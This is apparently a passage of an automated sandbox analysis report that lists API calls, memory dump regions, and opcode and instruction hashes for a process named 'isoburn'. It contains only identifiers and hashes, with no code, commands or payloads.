                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction ID: a68568e05d69966cb283d8591c127299c498650e1833db4408683d33e9c3247c
                                                            • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction Fuzzy Hash: 1131E5B5A01608ABDB54DF98D841EEFB7F9AF8C310F104619F918A7341D734A941CBA4
                                                            APIs
                                                            • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 007192F6
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction ID: 21c1873ce88cdfde780465e41bce87c71d5a6b76912835151f70bc65db29647c
                                                            • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction Fuzzy Hash: 303102B5A00208AFDB14DF98D881EEFB7F9AF8C314F108219F918A7341D774A951CBA4
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00701CAE,9ACB2CF8,00717EAF,00000000,00000004,00003000,?,?,?,?,?,00717EAF,00701CAE), ref: 007195DB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                            • Instruction ID: 04b7f447984f512ad2659b360564e21e1dd094e50ff64f5fb665fec917e2a82f
                                                            • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                            • Instruction Fuzzy Hash: F72168B5A00209AFDB10DF98DC41EEFB7B9EF88300F104219F918A7281DB75A911CBA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                            • Instruction ID: 309e34a790e69452b1220f94b8e2dd1194f20176b6c3a6bbc02404eeb68c1cee
                                                            • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                            • Instruction Fuzzy Hash: 92119171601604BAD760EB68DC02FFBB3ACEF85710F10461DFA1867282DB75B94687A5
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 007193D4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction ID: 08ca12341e6d611dea39033244a396cd30f956b4e9248d35d44891f4962e1714
                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction Fuzzy Hash: A7E08636200204BBD210EB69DC45FD777ADDFC5750F004119FA0C67242C671791087F5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9229c315c8146584895f75e9543abf0b6fdb405ba03c7afa8224e898cddb02e8
                                                            • Instruction ID: 87e065df6b62c999a3221b88ead1495048d9e85841a3f2c826f2188eeb099573
                                                            • Opcode Fuzzy Hash: 9229c315c8146584895f75e9543abf0b6fdb405ba03c7afa8224e898cddb02e8
                                                            • Instruction Fuzzy Hash: AB900261701A00866140B158480840660499BE1305395C125A05555A4C8618D9559269
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0492b3d66f05f424e022650beed04d4c1f7c6df18d7c4d87f381ac7fa0983c9b
                                                            • Instruction ID: 0a44bac72547551d5b83ceedede06abbbe0c23508b17680b78c41142dd22e445
                                                            • Opcode Fuzzy Hash: 0492b3d66f05f424e022650beed04d4c1f7c6df18d7c4d87f381ac7fa0983c9b
                                                            • Instruction Fuzzy Hash: 32900231705D0056B140B158488854640499BE0305B55C021E0425598C8A14DA565361
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 2a5d31e0a4c77499194f26803fe833ad51bd13ac3187bc7d17f8e8a5e995b678
                                                            • Instruction ID: ae66b592b8ebbacc1f3be1e08c16d76a4312a9f1dc224916ef413cba2e5f68d9
                                                            • Opcode Fuzzy Hash: 2a5d31e0a4c77499194f26803fe833ad51bd13ac3187bc7d17f8e8a5e995b678
                                                            • Instruction Fuzzy Hash: CB90023130190446F100B598540C64600498BE0305F55D021A5025599EC665D9916131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: eb4ed534c006033ac2117c4091b2fbbb69373b19b69abbe73e1d6bd7d4a4908c
                                                            • Instruction ID: 7d7bed2425a29712778572a71e7172a230ed6a887581ad40dfa4eb5b1b1914a5
                                                            • Opcode Fuzzy Hash: eb4ed534c006033ac2117c4091b2fbbb69373b19b69abbe73e1d6bd7d4a4908c
                                                            • Instruction Fuzzy Hash: F590023130190886F100B1584408B4600498BE0305F55C026A0125698D8615D9517521
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 18e2e2c7169d63df3a292ca96721c33d8da6a25c97071557846d69754aabef91
                                                            • Instruction ID: 2ae3ea0300523f5c16733598119cd3400e9248464636779f95ff5781b87c515b
                                                            • Opcode Fuzzy Hash: 18e2e2c7169d63df3a292ca96721c33d8da6a25c97071557846d69754aabef91
                                                            • Instruction Fuzzy Hash: D090023130198846F110B158840874A00498BD0305F59C421A442569CD8695D9917121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: eea05e5085d66ac8cd0196eb58b29611daa5ce024c8954e034b47b7ed67de45d
                                                            • Instruction ID: 101f575295f3752827056e6641309e5d8ea45c08385346d1e1b5c5f17c4062ef
                                                            • Opcode Fuzzy Hash: eea05e5085d66ac8cd0196eb58b29611daa5ce024c8954e034b47b7ed67de45d
                                                            • Instruction Fuzzy Hash: FC900221342941967545F1584408507404A9BE0345795C022A1415994C8526E956D621
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6b08caaaaad0281ec19cef8e924bf011fd9a7d8d973619b71ea5bd2ebb335c32
                                                            • Instruction ID: 15ddd011931705f750b0abd1a92cc4e72c91a9c1677c6800b817e9407a68e72a
                                                            • Opcode Fuzzy Hash: 6b08caaaaad0281ec19cef8e924bf011fd9a7d8d973619b71ea5bd2ebb335c32
                                                            • Instruction Fuzzy Hash: 9390023130190457F111B1584508707004D8BD0345F95C422A042559CD9656DA52A121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: cf4f81f7004c849ed4c780b11236c0af7a4728d4a47d30a6d460b77f67d025f6
                                                            • Instruction ID: 0fced49497dbb645a3573ec875bdb382f52dbf499db0178f8edf05fdc7872852
                                                            • Opcode Fuzzy Hash: cf4f81f7004c849ed4c780b11236c0af7a4728d4a47d30a6d460b77f67d025f6
                                                            • Instruction Fuzzy Hash: 4990022931390046F180B158540C60A00498BD1306F95D425A001659CCC915D9695321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f39aeb5e3dbd4e1724ccbccf6fff51bc6c83918fea9c40d84deeac183f773a4e
                                                            • Instruction ID: f6eb7efd78bcc10946da1650ba4c757273ec31b269d6bdb24b1416646c849d36
                                                            • Opcode Fuzzy Hash: f39aeb5e3dbd4e1724ccbccf6fff51bc6c83918fea9c40d84deeac183f773a4e
                                                            • Instruction Fuzzy Hash: 9E90022130190047F140B158541C6064049DBE1305F55D021E0415598CD915D9565222
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ca2156f668269b868c7d755c76b53080f92d559f6e0fe6d2549053db1116024f
                                                            • Instruction ID: 1ef41a309392db39a7d43addcad342e4c95f4d645dfeb18e6deee8888858d178
                                                            • Opcode Fuzzy Hash: ca2156f668269b868c7d755c76b53080f92d559f6e0fe6d2549053db1116024f
                                                            • Instruction Fuzzy Hash: A690022170190546F101B1584408616004E8BD0345F95C032A1025599ECA25DA92A131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 705861f49edf7d051e1cf451396b40acdae03967fe3330aac4af62bf371f822f
                                                            • Instruction ID: 5bfab570a393988003442a2c289f5293a3e0ff9e7b624f8a52d72b79c292b02e
                                                            • Opcode Fuzzy Hash: 705861f49edf7d051e1cf451396b40acdae03967fe3330aac4af62bf371f822f
                                                            • Instruction Fuzzy Hash: 27900261301D0447F140B558480860700498BD0306F55C021A2065599E8A29DD516135
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8f6c53d0b8ea5c2f782cdf91d11d618a2305b882ce24bb9b82f1f9094c2b1768
                                                            • Instruction ID: 2cb97a215f8eb434174c32e99a55642bae19ac33b226aa24183c8057a990701a
                                                            • Opcode Fuzzy Hash: 8f6c53d0b8ea5c2f782cdf91d11d618a2305b882ce24bb9b82f1f9094c2b1768
                                                            • Instruction Fuzzy Hash: 8B900221701900866140B16888489064049AFE1315755C131A0999594D8559D9655665
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 32d3b8a6339897519250e177f806bec4cd78faae36524adb305bf29b901fe47a
                                                            • Instruction ID: e0642929a6b3e3023f1ba353b68cb608ec2b90370b0142b492bdfbf6ac3b92c7
                                                            • Opcode Fuzzy Hash: 32d3b8a6339897519250e177f806bec4cd78faae36524adb305bf29b901fe47a
                                                            • Instruction Fuzzy Hash: C6900221311D0086F200B5684C18B0700498BD0307F55C125A0155598CC915D9615521
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9131e74f8075f3019315fbb913117083f9f857aa89ac3846cc03ab46f64c7ea8
                                                            • Instruction ID: 362683cb89db15de210f27edb290ce046a0869e054508d775a2bddd608c8e608
                                                            • Opcode Fuzzy Hash: 9131e74f8075f3019315fbb913117083f9f857aa89ac3846cc03ab46f64c7ea8
                                                            • Instruction Fuzzy Hash: 4590026134190486F100B1584418B060049CBE1305F55C025E1065598D8619DD526126
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 462485b716e0aeed2137245e2a2eb72a8b8552fe12f30019b4a86dcce24dffa2
                                                            • Instruction ID: 79d71e39199ecfdb452980cd8461a098d7b34dea3af4a22bf61af803590033a7
                                                            • Opcode Fuzzy Hash: 462485b716e0aeed2137245e2a2eb72a8b8552fe12f30019b4a86dcce24dffa2
                                                            • Instruction Fuzzy Hash: 6F900225311900472105F5580708507008A8BD5355355C031F1016594CD621D9615121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c19e678ffeaa8f16b170f89c63391f312e645de924ca6ef03d2b1f7b47194cd7
                                                            • Instruction ID: 1439990579765ab92143ea7f3399d21aba4cc72f698318d271216c6ec69796db
                                                            • Opcode Fuzzy Hash: c19e678ffeaa8f16b170f89c63391f312e645de924ca6ef03d2b1f7b47194cd7
                                                            • Instruction Fuzzy Hash: 2C900225321900462145F558060850B04899BD6355395C025F14175D4CC621D9655321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1c25154ebbe79c2abe80d8119f8c3dcf57e854d2777d9fd2e153833971282233
                                                            • Instruction ID: 771d0677f7157e42f5d85485d59492898e197f88654e4fda1d7272aa7c835233
                                                            • Opcode Fuzzy Hash: 1c25154ebbe79c2abe80d8119f8c3dcf57e854d2777d9fd2e153833971282233
                                                            • Instruction Fuzzy Hash: 9F90023170590846F150B158441874600498BD0305F55C021A0025698D8755DB5576A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8199e775ee686bcd6b87d17a8fc84e8b9eac6b3c59e091f4ecbe85957a04b639
                                                            • Instruction ID: 70c38a305123d2fec58c16777f5ac2102b5730a99810bec3127a8e946d7c378b
                                                            • Opcode Fuzzy Hash: 8199e775ee686bcd6b87d17a8fc84e8b9eac6b3c59e091f4ecbe85957a04b639
                                                            • Instruction Fuzzy Hash: ED90023130594886F140B1584408A4600598BD0309F55C021A00656D8D9625DE55B661
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: beaeb938a6d0ee90b09a205f9ca5a10c8ce8061224bf7f053037f69b50200620
                                                            • Instruction ID: 197760d4c6deb7bae3e082f9c41d087bf813751abe054a5d37e77fcd96976bdc
                                                            • Opcode Fuzzy Hash: beaeb938a6d0ee90b09a205f9ca5a10c8ce8061224bf7f053037f69b50200620
                                                            • Instruction Fuzzy Hash: D890023130190846F180B158440864A00498BD1305F95C025A0026698DCA15DB5977A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 80f3e16ad28b8644231422cbbec68578471c567368fc3c56eecd30b864842b26
                                                            • Instruction ID: ea27cd5728cb52555cec282a3b5a34c6985c4fae8cdb6d5d347265309f92ebda
                                                            • Opcode Fuzzy Hash: 80f3e16ad28b8644231422cbbec68578471c567368fc3c56eecd30b864842b26
                                                            • Instruction Fuzzy Hash: 67900261302900476105B1584418616404E8BE0305B55C031E10155D4DC525D9916125
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 288544b5839d5cb4fa991f17a5b973130935eeef3ed42229358dd43002163777
                                                            • Instruction ID: f162a06e11172bfd17370284740806adecc3d42fe65170b7b534f8ae6a210e1f
                                                            • Opcode Fuzzy Hash: 288544b5839d5cb4fa991f17a5b973130935eeef3ed42229358dd43002163777
                                                            • Instruction Fuzzy Hash: 65900231705A0446F100B158451870610498BD0305F65C421A04255ACD8795DA5165A2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 51ff1d585b12b013e0de8cabe01b575682e46d85018ead8bb45b2a24943c05d1
                                                            • Instruction ID: 0fe053e005be1b7432872ec92275d6334436208120901b59fdf74b4f83505512
